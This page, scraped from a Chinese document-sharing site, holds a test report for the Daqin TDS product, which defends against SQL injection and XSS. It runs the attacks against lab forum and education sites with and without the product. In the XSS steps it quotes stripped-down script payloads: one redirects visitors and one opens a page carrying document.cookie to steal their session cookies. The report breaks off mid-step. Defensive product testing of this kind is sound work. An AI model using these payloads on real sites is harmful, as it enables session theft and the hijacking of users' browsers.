- 1、本文档共31页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
TDS防SQL脚本注入攻击测试
TDS防SQL注入或脚本攻击测试
一、大秦TDS防SQL注入测试结构
大秦TDS防SQL注入测试结构由TDS系统、1台Web服务器、1台管理控制终端、1台攻击终端和互联网环境组成。网络结构图如下:
其中Web服务器(2)存在2种web应用,一种是“大秦TDS系统防SQL注入模拟Web服务器”,访问网址是:2/dqbbs/;一种是“大秦TDS防SQL注入测试网站”,访问网址是:2:8080/edu/。大秦TDS系统防SQL注入模拟Web服务器是种bbs论坛,通过各种SQL注入,普通注册用户能够跳过用户名密码检测获取论坛用户数据,同时通过发帖挂上恶意脚本,获取访问者的cookies信息和将访问者访问页面定向指定的url等恶意行为。首页显示如下图:
大秦TDS防SQL注入测试网站是种模拟在线远程教育网站,访问者可以通过构造脚本作为url地址,获取目标服务器的操作系统类型、数据库类型等资源信息。首页显示如下图:
二、TDS防SQL脚本注入攻击测试用例
2.1 跳过用户名密码登陆验证的SQL注入
2.1.1没有TDS保护情况下的SQL注入
A,使用正确的用户名和密码正常登陆;
使用正确的用户名和密码可以正常登陆。
B,使用不正确的用户名或密码登陆;
错误的用户名或密码验证失败。
C,使用带SQL语句的用户名和任意密码登陆(包括空密码);
空密码登陆:
使用带SQL语句的用户名和空密码可以登陆。
非空密码登陆:
在使用带SQL语句的用户名情况下可以使用任意密码登陆验证。
2.1.2有TDS保护情况下的SQL注入
使用带SQL语的用户名登陆;
输入带有SQL语句的用户名被TDS检测到,给予用户提示及对行为进行阻止,最终无法打开网页。
其中TDS防SQL注入模块配置如下图:
TDS流量统计如下图:
2.2 获取用户数据信息的SQL注入
2.2.1没有TDS保护情况下的SQL注入
A, 输入存在的用户编号进行查询;
输入存在的用户编号进行查询,可以查询到对应用户编号的信息。
B,输入不存在的用户编号进行查询;
由于不存在该用户编号,所以没有相关用户信息显示。
C,输入带SQL语句的用户编号的数据进行查询;
输入带SQL语句的用户编号进行查询后,可以查询到所有用户编号的信息。
2.2.2有TDS保护情况下的SQL注入
A,输入带SQL语句的职业编号的数据进行查询;
输入带有SQL语句的用户编号被TDS检测到,给予用户提示及对行为进行阻止,最终无法打开网页。
其中TDS防SQL注入模块配置如下图:
TDS流量统计如下图:
2.3 恶意重定向网站的脚本跨站攻击
2.3.1没有TDS保护情况下的脚本跨站攻击
A,打开Web服务器首页,注册一个论坛用户,进入某个论坛板块发表论坛文章;
B,在文本输入框输入下列内容:
“scriptlocation.href=;alert(你中了跨站攻击,现在转接到百度首页!→→^_^※^_^);/script”,点击提交,成功发表论坛帖子;
C,打开首页,点击标题为“跨连接演示”的论坛帖子;
D,弹出跨站攻击提示对话框,同时网页转到百度首页。
2.3.2有TDS保护情下的脚本跨站攻击
A,打开Web服务器首页,注册一个论坛用户,进入某个论坛板块发表论坛文章;
B,在文本输入框输入下列内容:
“scriptlocation.href=;alert(你中了跨站攻击,现在转接到百度首页!→→^_^※^_^);/script”,点击提交,弹出TDS防SQL注入安全警告,内容发表失败;
其中TDS防SQL注入模块配置如下图:
TDS数据流量统计如下图:
2.4 获取访问者的cookies信息的SQL注入
2.4.1没有TDS保护情况下的SQL注入
A,打开Web服务器首页,注册一个论坛用户,进入某个论坛板块发表论坛文章;
B,在文本输入框输入下列内容:
“你的Cookit信息已经被获取,信息就显示新打开的窗口scriptwindow.open(2:8080/edu/XSS.asp?txtName=+document.cookie);alert(你中招啦! ^_^);/script”,点击提交,成功发表论坛帖子;
C,打开首页,点击标题为“获取访问者的cookies信息演示”的论坛帖子;
D,弹出一个标题为“访问者的cookies信息”的新窗口,同时弹出“你中招了,^_^”的对话框提示;
打开的帖子内容并不会显示脚本里的内容,只是显示纯文本内容,如下图:
2.4.2有TDS保护情况下的SQL注入
A,打开Web服务器首页,注册一个论坛用户,进入某个论坛板块发表论坛文章;
B,
您可能关注的文档
- TD-LTE异频切换中A1A2A4门限设置.docx
- TD-LTE试运行.doc
- cpu参数功率表.doc
- Cpu和主板的简单介绍.doc
- CPU基础入门篇.doc
- CPU完整制造流程(带图).docx
- cpu定时器作用.doc
- TD13号路污水高程.doc
- CPU对存储器的读写.doc
- cpu排行很好很强大.doc
- 《GB/T 32151.42-2024温室气体排放核算与报告要求 第42部分:铜冶炼企业》.pdf
- GB/T 32151.42-2024温室气体排放核算与报告要求 第42部分:铜冶炼企业.pdf
- GB/T 38048.6-2024表面清洁器具 第6部分:家用和类似用途湿式硬地面清洁器具 性能测试方法.pdf
- 中国国家标准 GB/T 38048.6-2024表面清洁器具 第6部分:家用和类似用途湿式硬地面清洁器具 性能测试方法.pdf
- 《GB/T 38048.6-2024表面清洁器具 第6部分:家用和类似用途湿式硬地面清洁器具 性能测试方法》.pdf
- 《GB/T 18238.2-2024网络安全技术 杂凑函数 第2部分:采用分组密码的杂凑函数》.pdf
- GB/T 18238.2-2024网络安全技术 杂凑函数 第2部分:采用分组密码的杂凑函数.pdf
- 《GB/T 17215.686-2024电测量数据交换 DLMS/COSEM组件 第86部分:社区网络高速PLCISO/IEC 12139-1配置》.pdf
- GB/T 13542.4-2024电气绝缘用薄膜 第4部分:聚酯薄膜.pdf
- 《GB/T 13542.4-2024电气绝缘用薄膜 第4部分:聚酯薄膜》.pdf
文档评论(0)